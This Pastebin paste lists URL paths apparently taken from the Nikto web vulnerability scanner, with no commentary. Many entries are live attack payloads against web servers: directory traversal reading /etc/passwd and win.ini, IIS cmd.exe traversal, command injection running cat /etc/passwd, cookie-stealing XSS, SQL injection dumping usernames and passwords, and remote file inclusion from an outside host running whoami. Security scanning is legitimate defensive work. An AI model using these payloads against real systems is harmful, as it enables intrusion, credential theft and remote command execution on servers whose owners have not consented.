Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Nikto Vulnerability Scan Urls
- ***********
- ../../../../../../../../../../../../windows/win.ini
- ../../../../../../../../../../../../winnt/win.ini
- ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
- ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../
- /
- /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
- /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
- /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini
- /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
- /.%252e/.%252e/.%252e/.%252e/windows/win.ini
- /.%252e/.%252e/.%252e/.%252e/winnt/win.ini
- /.%252e/.%252e/.%252e/winnt/boot.ini
- /../../../../../../../../../../../../windows/win.ini
- /../../../../../../../../../../../../winnt/win.ini
- /../webserver.ini
- /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
- /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
- /..\\pixfir~1\\how_to_login.html
- /./
- /././..
- ////../../data/config/microsrv.cfg
- /_mem_bin/formslogin.asp?\\"><script>alert('Vulnerable')</script>
- /_mt/mt.cgi
- /_vti_bin/shtml.exe
- /~/<script>alert('Vulnerable')</script>.asp
- /~/<script>alert('Vulnerable')</script>.aspx
- /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
- /~root/
- /<script>alert('Vulnerable')</script>.shtm
- /<script>alert('Vulnerable')</script>.stm
- /3rdparty/phpMyAdmin/server_sync.php?c=phpinfo()
- /666%0a%0a<script>alert('Vulnerable');</script>666.jsp
- /a%5c.aspx
- /addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
- /admentor/adminadmin.asp
- /admin.cgi
- /admin/browse.asp?FilePath=c:\\&Opt=2&level=0
- /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\"><script>alert(document.cookie)</script>
- /administrator.cgi
- /administrator/gallery/gallery.php?directory=\\"<script>alert(document.cookie)</script>
- /administrator/gallery/navigation.php?directory=\\"<script>alert(document.cookie)</script>
- /administrator/gallery/uploadimage.php?directory=\\"<script>alert(document.cookie)</script>
- /administrator/gallery/view.php?path=\\"<script>alert(document.cookie)</script>
- /administrator/popups/sectionswindow.php?type=web&link=\\"<script>alert(document.cookie)</script>
- /administrator/upload.php?newbanner=1&choice=\\"<script>alert(document.cookie)</script>
- /article.cfm?id=1'<script>alert(document.cookie);</script>
- /author.asp
- /bigconf.cgi
- /billing/billing.apw
- /bin/architext_query.pl
- /bin/banner.cgi
- /bin/bannereditor.cgi
- /bin/bb-ack.sh
- /bin/bb-histlog.sh
- /bin/bb-rep.sh
- /bin/bb-replog.sh
- /bin/bbs_forum.cgi
- /bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /bin/csPassword.cgi
- /bin/csPassword/csPassword.cgi
- /bin/cutecast/members/
- /bin/day5datanotifier.cgi
- /bin/db2www/library/document.d2w/show
- /bin/logs/error_log
- /bin/lookwho.cgi
- /bin/maillist.cgi
- /bin/maillist.pl
- /bin/man.sh
- /bin/responder.cgi
- /bin/rguest.exe
- /bin/rksh
- /bin/rsh
- /bin/search.cgi
- /bin/tablebuild.pl
- /bin/tcsh
- /bin/test.cgi
- /bin/test/test.cgi
- /bin/textcounter.pl
- /bin/webwho.pl
- /bin/wguest.exe
- /bin/wwwboard.cgi.cgi
- /bin/wwwboard.pl
- /bin/www-sql
- /blah_badfile.shtml
- /blah-whatever-badfile.jsp
- /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini
- /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd
- /ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini
- /catinfo?<u><b>TESTING
- /certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
- /certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
- /cfappman/index.cfm
- /cfdocs/examples/cvbeans/beaninfo.cfm
- /cfdocs/examples/parks/detail.cfm
- /cfdocs/expeval/openfile.cfm
- /cfide/administrator/index.cfm
- /CFIDE/administrator/settings/version.cfm
- /cfide/Administrator/startstop.html
- /CFIDE/componentutils/cfcexplorer.cfc
- /cgi.cgi/architext_query.pl
- /cgi.cgi/bannereditor.cgi
- /cgi.cgi/bb-histlog.sh
- /cgi.cgi/bb-rep.sh
- /cgi.cgi/bb-replog.sh
- /cgi.cgi/bbs_forum.cgi
- /cgi.cgi/bizdb1-search.cgi
- /cgi.cgi/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi.cgi/csPassword/csPassword.cgi
- /cgi.cgi/cutecast/members/
- /cgi.cgi/day5datanotifier.cgi
- /cgi.cgi/db2www/library/document.d2w/show
- /cgi.cgi/lookwho.cgi
- /cgi.cgi/maillist.cgi
- /cgi.cgi/maillist.pl
- /cgi.cgi/man.sh
- /cgi.cgi/rguest.exe
- /cgi.cgi/rksh
- /cgi.cgi/rsh
- /cgi.cgi/scripts/slxweb.dll/getfile?type=Library&file=[invalid
- /cgi.cgi/search.cgi
- /cgi.cgi/sensepost.exe?/c+dir
- /cgi.cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
- /cgi.cgi/tcsh
- /cgi.cgi/test.cgi
- /cgi.cgi/test/test.cgi
- /cgi.cgi/textcounter.pl
- /cgi.cgi/wguest.exe
- /cgi.cgi/ws_ftp.ini
- /cgi.cgi/wwwboard.cgi.cgi
- /cgi.cgi/wwwboard.pl
- /cgi.cgi/www-sql
- /cgi/architext_query.pl
- /cgi/banner.cgi
- /cgi/bannereditor.cgi
- /cgi/bb-ack.sh
- /cgi/bb-histlog.sh
- /cgi/bb-rep.sh
- /cgi/bb-replog.sh
- /cgi/bbs_forum.cgi
- /cgi/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi/csPassword.cgi
- /cgi/csPassword/csPassword.cgi
- /cgi/cutecast/members/
- /cgi/day5datanotifier.cgi
- /cgi/db2www/library/document.d2w/show
- /cgi/logs/error_log
- /cgi/lookwho.cgi
- /cgi/maillist.cgi
- /cgi/maillist.pl
- /cgi/man.sh
- /cgi/responder.cgi
- /cgi/rguest.exe
- /cgi/rksh
- /cgi/rsh
- /cgi/search.cgi
- /cgi/tablebuild.pl
- /cgi/tcsh
- /cgi/test.cgi
- /cgi/test/test.cgi
- /cgi/textcounter.pl
- /cgi/webwho.pl
- /cgi/wguest.exe
- /cgi/wwwboard.cgi.cgi
- /cgi/wwwboard.pl
- /cgi/www-sql
- /cgi-914/architext_query.pl
- /cgi-914/bannereditor.cgi
- /cgi-914/bb-ack.sh
- /cgi-914/bb-histlog.sh
- /cgi-914/bb-rep.sh
- /cgi-914/bb-replog.sh
- /cgi-914/bbs_forum.cgi
- /cgi-914/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-914/csPassword/csPassword.cgi
- /cgi-914/cutecast/members/
- /cgi-914/day5datanotifier.cgi
- /cgi-914/db2www/library/document.d2w/show
- /cgi-914/logs/error_log
- /cgi-914/lookwho.cgi
- /cgi-914/maillist.cgi
- /cgi-914/maillist.pl
- /cgi-914/man.sh
- /cgi-914/responder.cgi
- /cgi-914/rguest.exe
- /cgi-914/rksh
- /cgi-914/rsh
- /cgi-914/search.cgi
- /cgi-914/tablebuild.pl
- /cgi-914/tcsh
- /cgi-914/test.cgi
- /cgi-914/test/test.cgi
- /cgi-914/textcounter.pl
- /cgi-914/webwho.pl
- /cgi-914/wguest.exe
- /cgi-914/wwwboard.cgi.cgi
- /cgi-914/wwwboard.pl
- /cgi-914/www-sql
- /cgi-915/architext_query.pl
- /cgi-915/banner.cgi
- /cgi-915/bannereditor.cgi
- /cgi-915/bb-ack.sh
- /cgi-915/bb-histlog.sh
- /cgi-915/bb-rep.sh
- /cgi-915/bb-replog.sh
- /cgi-915/bbs_forum.cgi
- /cgi-915/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-915/csPassword.cgi
- /cgi-915/csPassword/csPassword.cgi
- /cgi-915/cutecast/members/
- /cgi-915/day5datanotifier.cgi
- /cgi-915/db2www/library/document.d2w/show
- /cgi-915/logs/error_log
- /cgi-915/lookwho.cgi
- /cgi-915/maillist.cgi
- /cgi-915/maillist.pl
- /cgi-915/man.sh
- /cgi-915/responder.cgi
- /cgi-915/rguest.exe
- /cgi-915/rksh
- /cgi-915/rsh
- /cgi-915/search.cgi
- /cgi-915/tablebuild.pl
- /cgi-915/tcsh
- /cgi-915/test.cgi
- /cgi-915/test/test.cgi
- /cgi-915/textcounter.pl
- /cgi-915/webwho.pl
- /cgi-915/wguest.exe
- /cgi-915/wwwboard.cgi.cgi
- /cgi-915/wwwboard.pl
- /cgi-915/www-sql
- /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
- /cgi-bin/admin.cgi
- /cgibin/architext_query.pl
- /cgi-bin/architext_query.pl
- /cgibin/banner.cgi
- /cgi-bin/banner.cgi
- /cgibin/bannereditor.cgi
- /cgi-bin/bannereditor.cgi
- /cgibin/bb-ack.sh
- /cgi-bin/bb-ack.sh
- /cgibin/bb-histlog.sh
- /cgi-bin/bb-histlog.sh
- /cgibin/bb-rep.sh
- /cgi-bin/bb-rep.sh
- /cgibin/bb-replog.sh
- /cgi-bin/bb-replog.sh
- /cgibin/bbs_forum.cgi
- /cgi-bin/bbs_forum.cgi
- /cgibin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-bin/bugreport.cgi
- /cgibin/csPassword.cgi
- /cgi-bin/csPassword.cgi
- /cgibin/csPassword/csPassword.cgi
- /cgi-bin/csPassword/csPassword.cgi
- /cgibin/cutecast/members/
- /cgi-bin/cutecast/members/
- /cgibin/day5datanotifier.cgi
- /cgi-bin/day5datanotifier.cgi
- /cgibin/db2www/library/document.d2w/show
- /cgi-bin/db2www/library/document.d2w/show
- /cgi-bin/FormHandler.cgi
- /cgibin/logs/error_log
- /cgi-bin/logs/error_log
- /cgibin/lookwho.cgi
- /cgi-bin/lookwho.cgi
- /cgibin/maillist.cgi
- /cgi-bin/maillist.cgi
- /cgibin/maillist.pl
- /cgi-bin/maillist.pl
- /cgibin/man.sh
- /cgi-bin/man.sh
- /cgibin/php5
- /cgibin/responder.cgi
- /cgi-bin/responder.cgi
- /cgibin/rguest.exe
- /cgi-bin/rguest.exe
- /cgibin/rksh
- /cgi-bin/rksh
- /cgibin/rsh
- /cgi-bin/rsh
- /cgibin/search.cgi
- /cgi-bin/search.cgi
- /cgibin/tablebuild.pl
- /cgi-bin/tablebuild.pl
- /cgibin/tcsh
- /cgi-bin/tcsh
- /cgibin/test.cgi
- /cgi-bin/test.cgi
- /cgibin/test/test.cgi
- /cgi-bin/test/test.cgi
- /cgibin/textcounter.pl
- /cgi-bin/textcounter.pl
- /cgibin/webwho.pl
- /cgi-bin/webwho.pl
- /cgibin/wguest.exe
- /cgi-bin/wguest.exe
- /cgi-bin/wrap
- /cgibin/wwwboard.cgi.cgi
- /cgi-bin/wwwboard.cgi.cgi
- /cgibin/wwwboard.pl
- /cgi-bin/wwwboard.pl
- /cgibin/www-sql
- /cgi-bin/www-sql
- /cgi-bin-sdb/architext_query.pl
- /cgi-bin-sdb/banner.cgi
- /cgi-bin-sdb/bannereditor.cgi
- /cgi-bin-sdb/bb-ack.sh
- /cgi-bin-sdb/bb-histlog.sh
- /cgi-bin-sdb/bb-rep.sh
- /cgi-bin-sdb/bb-replog.sh
- /cgi-bin-sdb/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-bin-sdb/csPassword.cgi
- /cgi-bin-sdb/csPassword/csPassword.cgi
- /cgi-bin-sdb/cutecast/members/
- /cgi-bin-sdb/day5datanotifier.cgi
- /cgi-bin-sdb/logs/error_log
- /cgi-bin-sdb/lookwho.cgi
- /cgi-bin-sdb/maillist.cgi
- /cgi-bin-sdb/maillist.pl
- /cgi-bin-sdb/responder.cgi
- /cgi-bin-sdb/rguest.exe
- /cgi-bin-sdb/rksh
- /cgi-bin-sdb/rsh
- /cgi-bin-sdb/tablebuild.pl
- /cgi-bin-sdb/tcsh
- /cgi-bin-sdb/test.cgi
- /cgi-bin-sdb/test/test.cgi
- /cgi-bin-sdb/webwho.pl
- /cgi-bin-sdb/wguest.exe
- /cgi-bin-sdb/wwwboard.cgi.cgi
- /cgi-bin-sdb/www-sql
- /cgi-exe/architext_query.pl
- /cgi-exe/banner.cgi
- /cgi-exe/bannereditor.cgi
- /cgi-exe/bb-ack.sh
- /cgi-exe/bb-histlog.sh
- /cgi-exe/bb-rep.sh
- /cgi-exe/bb-replog.sh
- /cgi-exe/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-exe/cgiinfo.cgi
- /cgi-exe/csPassword.cgi
- /cgi-exe/csPassword/csPassword.cgi
- /cgi-exe/cutecast/members/
- /cgi-exe/day5datanotifier.cgi
- /cgi-exe/formmail.cgi
- /cgi-exe/logs/error_log
- /cgi-exe/lookwho.cgi
- /cgi-exe/maillist.cgi
- /cgi-exe/maillist.pl
- /cgi-exe/responder.cgi
- /cgi-exe/restore_config.cgi
- /cgi-exe/rguest.exe
- /cgi-exe/rksh
- /cgi-exe/rsh
- /cgi-exe/search.cgi
- /cgi-exe/tablebuild.pl
- /cgi-exe/tcsh
- /cgi-exe/test.cgi
- /cgi-exe/test/test.cgi
- /cgi-exe/textcounter.pl
- /cgi-exe/webwho.pl
- /cgi-exe/wguest.exe
- /cgi-exe/wwwboard.cgi.cgi
- /cgi-exe/wwwboard.pl
- /cgi-exe/www-sql
- /cgi-home/architext_query.pl
- /cgi-home/banner.cgi
- /cgi-home/bannereditor.cgi
- /cgi-home/bb-ack.sh
- /cgi-home/bb-histlog.sh
- /cgi-home/bb-rep.sh
- /cgi-home/bb-replog.sh
- /cgi-home/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-home/csPassword.cgi
- /cgi-home/csPassword/csPassword.cgi
- /cgi-home/cutecast/members/
- /cgi-home/day5datanotifier.cgi
- /cgi-home/logs/error_log
- /cgi-home/lookwho.cgi
- /cgi-home/maillist.cgi
- /cgi-home/maillist.pl
- /cgi-home/responder.cgi
- /cgi-home/rguest.exe
- /cgi-home/rksh
- /cgi-home/rsh
- /cgi-home/search.cgi
- /cgi-home/tablebuild.pl
- /cgi-home/tcsh
- /cgi-home/test.cgi
- /cgi-home/test/test.cgi
- /cgi-home/textcounter.pl
- /cgi-home/webwho.pl
- /cgi-home/wguest.exe
- /cgi-home/wwwboard.cgi.cgi
- /cgi-home/www-sql
- /cgi-local/architext_query.pl
- /cgi-local/banner.cgi
- /cgi-local/bannereditor.cgi
- /cgi-local/bb-ack.sh
- /cgi-local/bb-histlog.sh
- /cgi-local/bb-rep.sh
- /cgi-local/bb-replog.sh
- /cgi-local/bbs_forum.cgi
- /cgi-local/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-local/csPassword.cgi
- /cgi-local/csPassword/csPassword.cgi
- /cgi-local/cutecast/members/
- /cgi-local/day5datanotifier.cgi
- /cgi-local/db2www/library/document.d2w/show
- /cgi-local/logs/error_log
- /cgi-local/lookwho.cgi
- /cgi-local/maillist.cgi
- /cgi-local/maillist.pl
- /cgi-local/man.sh
- /cgi-local/responder.cgi
- /cgi-local/rguest.exe
- /cgi-local/rksh
- /cgi-local/rsh
- /cgi-local/search.cgi
- /cgi-local/tablebuild.pl
- /cgi-local/tcsh
- /cgi-local/test.cgi
- /cgi-local/test/test.cgi
- /cgi-local/textcounter.pl
- /cgi-local/webwho.pl
- /cgi-local/wguest.exe
- /cgi-local/wwwboard.cgi.cgi
- /cgi-local/wwwboard.pl
- /cgi-local/www-sql
- /cgi-mod/architext_query.pl
- /cgi-mod/banner.cgi
- /cgi-mod/bannereditor.cgi
- /cgi-mod/bb-ack.sh
- /cgi-mod/bb-histlog.sh
- /cgi-mod/bb-rep.sh
- /cgi-mod/bb-replog.sh
- /cgi-mod/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-mod/csPassword.cgi
- /cgi-mod/csPassword/csPassword.cgi
- /cgi-mod/cutecast/members/
- /cgi-mod/day5datanotifier.cgi
- /cgi-mod/logs/error_log
- /cgi-mod/lookwho.cgi
- /cgi-mod/maillist.cgi
- /cgi-mod/maillist.pl
- /cgi-mod/responder.cgi
- /cgi-mod/rguest.exe
- /cgi-mod/rksh
- /cgi-mod/rsh
- /cgi-mod/server.php
- /cgi-mod/tablebuild.pl
- /cgi-mod/tcsh
- /cgi-mod/test.cgi
- /cgi-mod/test/test.cgi
- /cgi-mod/webwho.pl
- /cgi-mod/wguest.exe
- /cgi-mod/wwwboard.cgi.cgi
- /cgi-mod/www-sql
- /cgi-perl/architext_query.pl
- /cgi-perl/banner.cgi
- /cgi-perl/bannereditor.cgi
- /cgi-perl/bb-ack.sh
- /cgi-perl/bb-histlog.sh
- /cgi-perl/bb-rep.sh
- /cgi-perl/bb-replog.sh
- /cgi-perl/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-perl/csPassword.cgi
- /cgi-perl/csPassword/csPassword.cgi
- /cgi-perl/cutecast/members/
- /cgi-perl/day5datanotifier.cgi
- /cgi-perl/logs/error_log
- /cgi-perl/lookwho.cgi
- /cgi-perl/maillist.cgi
- /cgi-perl/maillist.pl
- /cgi-perl/responder.cgi
- /cgi-perl/rguest.exe
- /cgi-perl/rksh
- /cgi-perl/rsh
- /cgi-perl/search.cgi
- /cgi-perl/tablebuild.pl
- /cgi-perl/tcsh
- /cgi-perl/test.cgi
- /cgi-perl/test/test.cgi
- /cgi-perl/webwho.pl
- /cgi-perl/wguest.exe
- /cgi-perl/wwwboard.cgi.cgi
- /cgi-perl/www-sql
- /cgis/architext_query.pl
- /cgis/banner.cgi
- /cgis/bannereditor.cgi
- /cgis/bb-ack.sh
- /cgis/bb-histlog.sh
- /cgis/bb-rep.sh
- /cgis/bb-replog.sh
- /cgis/bbs_forum.cgi
- /cgis/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgis/csPassword.cgi
- /cgis/csPassword/csPassword.cgi
- /cgis/cutecast/members/
- /cgis/day5datanotifier.cgi
- /cgis/logs/error_log
- /cgis/lookwho.cgi
- /cgis/maillist.cgi
- /cgis/maillist.pl
- /cgis/man.sh
- /cgis/responder.cgi
- /cgis/rguest.exe
- /cgis/rksh
- /cgis/rsh
- /cgis/search.cgi
- /cgis/tablebuild.pl
- /cgis/tcsh
- /cgis/test.cgi
- /cgis/test/test.cgi
- /cgis/textcounter.pl
- /cgis/webwho.pl
- /cgis/wguest.exe
- /cgis/wwwboard.cgi.cgi
- /cgis/wwwboard.pl
- /cgis/www-sql
- /cgi-sys/architext_query.pl
- /cgi-sys/banner.cgi
- /cgi-sys/bannereditor.cgi
- /cgi-sys/bb-ack.sh
- /cgi-sys/bb-histlog.sh
- /cgi-sys/bb-rep.sh
- /cgi-sys/bb-replog.sh
- /cgi-sys/bbs_forum.cgi
- /cgi-sys/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-sys/csPassword.cgi
- /cgi-sys/csPassword/csPassword.cgi
- /cgi-sys/cutecast/members/
- /cgi-sys/day5datanotifier.cgi
- /cgi-sys/db2www/library/document.d2w/show
- /cgi-sys/logs/error_log
- /cgi-sys/lookwho.cgi
- /cgi-sys/maillist.cgi
- /cgi-sys/maillist.pl
- /cgi-sys/man.sh
- /cgi-sys/responder.cgi
- /cgi-sys/rguest.exe
- /cgi-sys/rksh
- /cgi-sys/rsh
- /cgi-sys/search.cgi
- /cgi-sys/tablebuild.pl
- /cgi-sys/tcsh
- /cgi-sys/test.cgi
- /cgi-sys/test/test.cgi
- /cgi-sys/textcounter.pl
- /cgi-sys/webwho.pl
- /cgi-sys/wguest.exe
- /cgi-sys/wwwboard.cgi.cgi
- /cgi-sys/wwwboard.pl
- /cgi-sys/www-sql
- /cgi-win/architext_query.pl
- /cgi-win/banner.cgi
- /cgi-win/bannereditor.cgi
- /cgi-win/bb-ack.sh
- /cgi-win/bb-histlog.sh
- /cgi-win/bb-rep.sh
- /cgi-win/bb-replog.sh
- /cgi-win/bbs_forum.cgi
- /cgi-win/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /cgi-win/csPassword.cgi
- /cgi-win/csPassword/csPassword.cgi
- /cgi-win/cutecast/members/
- /cgi-win/day5datanotifier.cgi
- /cgi-win/logs/error_log
- /cgi-win/lookwho.cgi
- /cgi-win/maillist.cgi
- /cgi-win/maillist.pl
- /cgi-win/man.sh
- /cgi-win/responder.cgi
- /cgi-win/rguest.exe
- /cgi-win/rksh
- /cgi-win/rsh
- /cgi-win/search.cgi
- /cgi-win/tablebuild.pl
- /cgi-win/tcsh
- /cgi-win/test.cgi
- /cgi-win/test/test.cgi
- /cgi-win/textcounter.pl
- /cgi-win/webwho.pl
- /cgi-win/wguest.exe
- /cgi-win/wwwboard.cgi.cgi
- /cgi-win/wwwboard.pl
- /cgi-win/www-sql
- /clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
- /ConsoleHelp/default.jsp
- /courier/intermediate_login.html
- /ea-gBook/index_inc.php?inc_ordner=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
- /emailfriend/emailarticle.php?id=\\"<script>alert(document.cookie)</script>
- /emailfriend/emailfaq.php?id=\\"<script>alert(document.cookie)</script>
- /emailfriend/emailnews.php?id=\\"<script>alert(document.cookie)</script>
- /examples/cookie
- /examples/session
- /fcgi-bin/architext_query.pl
- /fcgi-bin/banner.cgi
- /fcgi-bin/bannereditor.cgi
- /fcgi-bin/bb-ack.sh
- /fcgi-bin/bb-histlog.sh
- /fcgi-bin/bb-rep.sh
- /fcgi-bin/bb-replog.sh
- /fcgi-bin/bbs_forum.cgi
- /fcgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /fcgi-bin/csPassword.cgi
- /fcgi-bin/csPassword/csPassword.cgi
- /fcgi-bin/cutecast/members/
- /fcgi-bin/day5datanotifier.cgi
- /fcgi-bin/logs/error_log
- /fcgi-bin/lookwho.cgi
- /fcgi-bin/maillist.cgi
- /fcgi-bin/maillist.pl
- /fcgi-bin/man.sh
- /fcgi-bin/responder.cgi
- /fcgi-bin/rguest.exe
- /fcgi-bin/rksh
- /fcgi-bin/rsh
- /fcgi-bin/search.cgi
- /fcgi-bin/tablebuild.pl
- /fcgi-bin/tcsh
- /fcgi-bin/test.cgi
- /fcgi-bin/test/test.cgi
- /fcgi-bin/textcounter.pl
- /fcgi-bin/webwho.pl
- /fcgi-bin/wguest.exe
- /fcgi-bin/wwwboard.cgi.cgi
- /fcgi-bin/wwwboard.pl
- /fcgi-bin/www-sql
- /file/../../../../../../../../etc/
- /filemanager/filemanager_forms.php?lib_path=http://cirt.net/rfiinc.txt?
- /forum/My_eGallery/public/displayCategory.php
- /forumdisplay.php?GLOBALS[]=1&f=2&comma=\\".system('id').\\"
- /forums//adm/config.php
- /forums//admin/config.php
- /forums//administrator/config.php
- /forums/config.php
- /ganglia/
- /gb/index.php?login=true
- /geeklog/users.php
- /getaccess
- /global.inc
- /guestbook/admin.php
- /guestbook/guestbook.html
- /guestbook/guestbookdat
- /guestbook/pwd
- /help.html
- /help/
- /hola/admin/cms/htmltags.php?datei=./sec/data.php
- /horde/imp/test.php
- /horde/test.php
- /horde/test.php?mode=phpinfo
- /htbin/architext_query.pl
- /htbin/banner.cgi
- /htbin/bannereditor.cgi
- /htbin/bb-ack.sh
- /htbin/bb-histlog.sh
- /htbin/bb-rep.sh
- /htbin/bb-replog.sh
- /htbin/bbs_forum.cgi
- /htbin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /htbin/csPassword.cgi
- /htbin/csPassword/csPassword.cgi
- /htbin/cutecast/members/
- /htbin/day5datanotifier.cgi
- /htbin/db2www/library/document.d2w/show
- /htbin/logs/error_log
- /htbin/lookwho.cgi
- /htbin/maillist.cgi
- /htbin/maillist.pl
- /htbin/man.sh
- /htbin/responder.cgi
- /htbin/rguest.exe
- /htbin/rksh
- /htbin/rsh
- /htbin/search.cgi
- /htbin/tablebuild.pl
- /htbin/tcsh
- /htbin/test.cgi
- /htbin/test.cgi.php
- /htbin/test/test.cgi
- /htbin/textcounter.pl
- /htbin/webwho.pl
- /htbin/wguest.exe
- /htbin/wwwboard.cgi.cgi
- /htbin/wwwboard.pl
- /htbin/www-sql
- /html/cgi-bin/cgicso?query=AAA
- /https-admserv/bin/index?/<script>alert(document.cookie)</script>
- /imp/horde/test.php
- /imp/horde/test.php?mode=phpinfo
- /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
- /inc/common.load.php
- /inc/config.php
- /inc/dbase.php
- /index.html.bak
- /index.html~
- /index.php/123
- /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
- /index.php?dir=<script>alert('Vulnerable')</script>
- /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
- /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20informa
- /index.php?option=search&searchword=<script>alert(document.cookie);</script>
- /invoker/JMXInvokerServlet
- /jmx-console/
- /jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer
- /kboard/
- /lists/admin/
- /mambo/index.php?Itemid=u2Ia3
- /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
- /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
- /modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
- /modules/My_eGallery/public/displayCategory.php
- /mpcgi/admin.cgi
- /mpcgi/architext_query.pl
- /mpcgi/banner.cgi
- /mpcgi/bannereditor.cgi
- /mpcgi/bb-ack.sh
- /mpcgi/bb-histlog.sh
- /mpcgi/bb-rep.sh
- /mpcgi/bb-replog.sh
- /mpcgi/bbs_forum.cgi
- /mpcgi/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /mpcgi/csPassword.cgi
- /mpcgi/csPassword/csPassword.cgi
- /mpcgi/cutecast/members/
- /mpcgi/day5datanotifier.cgi
- /mpcgi/db2www/library/document.d2w/show
- /mpcgi/index.php
- /mpcgi/logs/error_log
- /mpcgi/lookwho.cgi
- /mpcgi/maillist.cgi
- /mpcgi/maillist.pl
- /mpcgi/man.sh
- /mpcgi/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
- /mpcgi/responder.cgi
- /mpcgi/rguest.exe
- /mpcgi/rksh
- /mpcgi/rsh
- /mpcgi/search.cgi
- /mpcgi/tablebuild.pl
- /mpcgi/tcsh
- /mpcgi/test.cgi
- /mpcgi/test/test.cgi
- /mpcgi/textcounter.pl
- /mpcgi/webwho.pl
- /mpcgi/wguest.exe
- /mpcgi/wwwboard.cgi.cgi
- /mpcgi/wwwboard.pl
- /mpcgi/www-sql
- /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
- /msadc/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG
- /My_eGallery/public/displayCategory.php
- /nosuchurl/><script>alert('Vulnerable')</script>
- /ows-bin/
- /ows-bin/.cobalt
- /ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
- /ows-bin/.fhp
- /ows-bin/adduser.cgi
- /ows-bin/admin.php
